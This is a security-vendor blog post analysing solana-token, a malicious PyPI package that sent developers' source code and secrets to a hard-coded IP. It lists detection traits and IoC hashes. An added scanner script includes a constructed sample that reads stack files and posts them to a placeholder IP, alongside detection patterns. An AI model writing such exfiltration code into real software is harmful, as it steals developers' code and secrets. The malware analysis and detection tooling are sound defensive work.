Threat Research, May 13, 2025

Same name, different hack: PyPI package targets Solana developers

A new Python package revives the name of a malicious module to steal source code and secrets from blockchain developers’ machines.

Karlo Zanki, Reverse Engineer at ReversingLabs

The ReversingLabs research team has written about the surge in recent years in software supply chain attacks that target cryptocurrency. RL’s 2025 Software Supply Chain Security Report documented 23 distinct malicious supply chain campaigns targeting cryptocurrency applications and infrastructure in 2024 alone.

That trend continues. So far in 2025, RL researchers discovered a number of new campaigns that appear to target cryptocurrency assets. In April, for example, RL researcher Lucija Valentić wrote about the discovery of an npm package, pdf-to-office, that injected malicious code into legitimate, locally-installed files to steal funds stored in Atomic Wallet and Exodus crypto wallets.

The research team’s latest discovery involves a malicious PyPI open source package that poses as an application for the Solana blockchain: solana-token. When installed, the malicious package attempts to exfiltrate source code and developer secrets from the developer’s machine to a hard-coded IP address.

Here’s what RL researchers found — and how organizations should respond to address the growing number of supply chain threats targeting cryptocurrency projects.

All eyes on crypto

Solana is a popular, open-source blockchain platform founded in 2017 and designed by San Francisco-based Solana Labs to support a range of decentralized, scalable financial applications and services. The project is run by the Geneva-based Solana Foundation.

Solana is sought after within cryptocurrency circles for the speed of transactions and the relatively low transaction fees it allows compared to blockchains like Ethereum. The platform also supports the popular Solana (SOL) cryptocurrency.

The Python package RL detected, solana-token, pretends to be a utility for developers working on applications that leverage the Solana blockchain. While the PyPI landing page for the package did not include a description, the package name and functions suggest that developers looking to create their own blockchains were the likely targets of the malicious actors behind this package.

Before PyPI removed the solana-token package, it was downloaded more than 600 times, possibly via links shared and promoted on developer-focused platforms.

How the malicious package was discovered

What made this package stand out was a short list of characteristics present in the majority of malicious open source and commercial, third-party software packages the RL research team has discovered. They include:

  • Code containing URLs that reference a host by IP address. This is a common strategy used to obscure communications with malicious command and control servers or hosts used to store exfiltrated data. Using the IP address versus a host name makes it (somewhat) less likely that scanning tools will flag the behavior.
  • Code that initiates outbound communications to non-standard ports on external servers. Communications to ports other than the commonly used ones such as 443 (HTTPS), 53 (DNS), 22 (SSH) and 23 (Telnet) are not necessarily malicious, but they are worthy of further investigation.
  • Code that reads from files. Application code that reads data from files is a common feature of “infostealer” malware. While not conclusively malicious, it is, like so many other suspicious behaviors, one that warrants closer inspection by developers.

The hunt for secrets is on

The suspicious behaviors in solana-token were implemented with two clear goals: stealing application code, and gathering sensitive information or developer secrets that might be hiding within it. For example, the solana-token package contained a method that was ostensibly intended to implement blockchain functionality. However, when executed, this method scanned the Python execution stack, then copied and exfiltrated source code contained in all the files in the execution chain to a remote server.

[Figure: Sample of solana-token source code showing data exfiltration]
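The three triage traits listed above, together with the execution-stack scanning described for solana-token, can be checked statically before a package is ever installed. The script below is an added example, not ReversingLabs' tooling or code from the package; it walks a Python file's AST and flags URLs that address a host by IP literal, non-standard ports, unguarded file reads and (as an assumed marker, since the post does not name the API the package used) stack-introspection calls. The sample source, IP and port are constructed placeholders.

```python
import ast
import re

# Heuristics from the post: URL with an IP literal, outbound traffic to a
# non-standard port, file reads. Stack introspection is an assumed marker for
# "scanning the execution stack"; the post does not name the API used.
IP_URL = re.compile(r"^(https?)://(\d{1,3}(?:\.\d{1,3}){3})(?::(\d+))?")
COMMON_PORTS = {22, 23, 53, 80, 443}
STACK_APIS = {"inspect.stack", "inspect.currentframe", "sys._getframe"}

def _dotted(node):
    """'a.b.c' for a Name/Attribute chain such as requests.post, else ''."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""

def scan_source(src):
    """Return sorted (lineno, finding) pairs for one Python source file."""
    findings = set()
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            m = IP_URL.match(node.value)
            if m:
                findings.add((node.lineno, f"url-to-ip-literal {m.group(2)}"))
                port = int(m.group(3) or (443 if m.group(1) == "https" else 80))
                if port not in COMMON_PORTS:
                    findings.add((node.lineno, f"non-standard-port {port}"))
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name == "open" and len(node.args) < 2:  # no positional mode: a read
                findings.add((node.lineno, "file-read"))
            elif name in STACK_APIS:
                findings.add((node.lineno, f"stack-introspection {name}"))
    return sorted(findings)

# Constructed sample mimicking the traits described; the IP (TEST-NET-3) and
# port are placeholders, not IoCs from the post.
SAMPLE = '''\
import inspect, requests
def build_chain():
    for frame in inspect.stack():
        code = open(frame.filename).read()
        requests.post("http://203.0.113.7:9090/collect", data=code)
'''
```

Running `scan_source(SAMPLE)` reports all four traits on lines 3 to 5 of the sample; run it over every `.py` file in an unpacked wheel or sdist and review any hits by hand.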

This kind of malicious behavior is not commonly seen in the malware the RL research team has identified hiding in open source packages. The objective in solana-token, the team believes, was to steal hardcoded crypto-related secrets that often lie unprotected within code. Those secrets can then be used to access sensitive infrastructure and applications such as cryptocurrency wallets.

Our researchers have seen this type of behavior before. For example, in 2024 the team uncovered a malicious campaign dubbed "BIPClip", which I wrote about at the time, that involved seven PyPI packages designed to steal BIP39 mnemonic phrases used for crypto wallet recovery. These packages, downloaded nearly 7,500 times, also targeted developers by masquerading as legitimate tools, as solana-token does.

Same name, different hack

An interesting thing to note is that this isn’t the first time we’ve discovered a malicious package named solana-token. In fact, this package is reusing the name of a package published a year ago that was detected and removed. (A history of all the solana-token packages can be found at secure.software.) The package version numbers are different (0.0.1 and 0.0.2 in the latest versions, versus 1.0.1 and 1.0.2 in the earlier versions). And the content of the packages themselves is different. RL does not have conclusive evidence that the same malicious actors are behind both packages, though it is possible.

What is interesting is that it should not be possible to re-use the name of a malicious package that has been removed from PyPI. However, PyPI told RL that the authors of the prior solana-token packages removed them from PyPI themselves, not the PyPI security administrators. That left the package name available for re-use. The fact that it was re-used suggests the same malicious actors that pulled down the earlier solana-token package may be behind the new malicious version.

This time, RL reported the latest solana-token package to the PyPI administrators and it has been removed. That should make it impossible to continue posting files to PyPI that use the solana-token name.

Indicators of Compromise (IOCs)

Indicators of Compromise (IoCs) refer to forensic artifacts or evidence related to a security breach or unauthorized activity on a computer network or system. IOCs play a crucial role in cybersecurity investigations and cybersecurity incident response efforts, helping analysts and cybersecurity professionals identify and detect potential security incidents.

The following IOCs were collected as part of RL's investigation of solana-token and the malicious software supply chain campaign.

package_name    version    SHA1
solana-token    0.0.1      f4e1149360174b4fcf0dcc6e61898c8180324893
solana-token    0.0.1      0b8697f8e81956e7c0c5383806fa69630c38ad33
solana-token    0.0.2      e07457e36bf9aab1dc2b54acd30ec8f9e5c60c84
solana-token    0.0.2      9719d1e076ab67a18f231889cad4b451f539ce72

Supply chain attacks on crypto projects continue

The discovery of another malicious open source module that appears to target developers working on cryptocurrency-related applications makes it clear that supply chain attacks on crypto-related projects are continuing. Unlike recent attacks, however, such as those targeting the Atomic and Exodus crypto wallets, solana-token clearly targets crypto developers with the goal of obtaining application code and the sensitive information it contains, almost certainly as a precursor to other attacks.

The solana-token package is a reminder to development teams and organizations to be on the lookout for supply chain threats and attacks. Development teams need to aggressively monitor for suspicious activity or unexplained changes within both open source and commercial, third-party software modules. By stopping malicious code before it is allowed to penetrate secure development environments, teams can prevent destructive supply chain attacks.

Keep learning

  • Get up to speed on the state of software security with RL's Software Supply Chain Security Report 2026. Plus: See the webinar discussing the findings.
  • Learn why binary analysis is a must-have in the Gartner® CISO Playbook for Commercial Software Supply Chain Security.
  • Take action on securing AI/ML with our report: AI Is the Supply Chain. Plus: See RL's research on nullifAI and watch how RL discovered the novel threat.
  • Get the report: Go Beyond the SBOM. Plus: See the CycloneDX xBOM webinar.
